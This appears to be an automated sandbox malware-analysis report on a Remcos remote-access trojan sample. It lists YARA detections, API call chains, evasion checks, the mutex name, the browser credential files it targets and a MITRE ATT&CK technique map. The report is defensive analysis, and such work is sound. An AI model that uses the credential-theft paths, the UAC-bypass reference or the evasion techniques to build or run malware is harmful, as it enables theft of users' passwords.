                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00452F001_2_00452F00
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00426FAD1_2_00426FAD
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: String function: 00401F66 appears 50 times
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: String function: 004020E7 appears 40 times
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: String function: 004338A5 appears 42 times
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: String function: 00433FB0 appears 55 times
                        Source: NssBkEQKsI.exeStatic PE information: Resource name: RT_RCDATA type: DOS executable (COM, 0x8C-variant)
                        Source: NssBkEQKsI.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: NssBkEQKsI.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@1/1@0/1
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,1_2_00416AB7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,1_2_0040E219
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,1_2_0041A63F
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDH
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Software\1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Rmc-MKYDDH1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Exe1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Exe1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Rmc-MKYDDH1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: 0DG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Inj1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Inj1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: BG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: BG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: BG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: @CG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: BG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: exepath1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: @CG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: exepath1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: BG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: licence1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: `=G1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: XCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: dCG1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: Administrator1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: User1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: del1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: del1_2_0040D767
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCommand line argument: del1_2_0040D767
                        Source: NssBkEQKsI.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: NssBkEQKsI.exeVirustotal: Detection: 76%
                        Source: NssBkEQKsI.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeSection loaded: mswsock.dllJump to behavior
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: NssBkEQKsI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: NssBkEQKsI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                        Source: NssBkEQKsI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                        Source: NssBkEQKsI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                        Source: NssBkEQKsI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                        Source: NssBkEQKsI.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004567E0 push eax; ret 1_2_004567FE
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00455EAF push ecx; ret 1_2_00455EC2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00433FF6 push ecx; ret 1_2_00434009
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW,1_2_00406128
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040E54F Sleep,ExitProcess,1_2_0040E54F
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_004198C2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeWindow / User API: threadDelayed 3449Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeWindow / User API: threadDelayed 6016Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeWindow / User API: foregroundWindowGot 1744Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7848Thread sleep count: 203 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7848Thread sleep time: -101500s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7852Thread sleep count: 3449 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7852Thread sleep time: -10347000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7852Thread sleep count: 6016 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exe TID: 7852Thread sleep time: -18048000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeAPI call chain: ExitProcess graph end nodegraph_1-47674
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00442554 mov eax, dword ptr fs:[00000030h]1_2_00442554
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0044E92E GetProcessHeap,1_2_0044E92E
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434168
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433B44
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00433CD7 SetUnhandledExceptionFilter,1_2_00433CD7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe1_2_00410F36
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00418754 mouse_event,1_2_00418754
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager;B
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\8
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDH\GBY
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagercketsM
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                        Source: NssBkEQKsI.exe, 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.1.drBinary or memory string: [Program Manager]
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00433E0A cpuid 1_2_00433E0A
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoA,1_2_0040E679
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: EnumSystemLocalesW,1_2_004470AE
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoW,1_2_004510BA
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004511E3
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoW,1_2_004512EA
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004513B7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoW,1_2_00447597
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450A7F
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: EnumSystemLocalesW,1_2_00450CF7
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: EnumSystemLocalesW,1_2_00450D42
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: EnumSystemLocalesW,1_2_00450DDD
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00450E6A
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_00404915 GetLocalTime,CreateEventA,CreateThread,1_2_00404915
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0041A7A2 GetComputerNameExW,GetUserNameW,1_2_0041A7A2
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: 1_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0044800F

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_2_0040B21B
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_2_0040B335
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: \key3.db1_2_0040B335

                        Remote Access Functionality

                        barindex
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-MKYDDHJump to behavior
                        Source: Yara matchFile source: NssBkEQKsI.exe, type: SAMPLE
                        Source: Yara matchFile source: 1.0.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NssBkEQKsI.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.3721678274.000000000232F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3720995968.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.1263548212.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.3721285865.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NssBkEQKsI.exe PID: 7800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Users\user\Desktop\NssBkEQKsI.exeCode function: cmd.exe1_2_00405042
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        2
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        11
                        Ingress Tool Transfer
                        Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts12
                        Command and Scripting Interpreter
                        1
                        Windows Service
                        1
                        Bypass User Account Control
                        2
                        Obfuscated Files or Information
                        211
                        Input Capture
                        1
                        Account Discovery
                        Remote Desktop Protocol211
                        Input Capture
                        2
                        Encrypted Channel
                        Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts2
                        Service Execution
                        Logon Script (Windows)1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        2
                        Credentials In Files
                        1
                        System Service Discovery
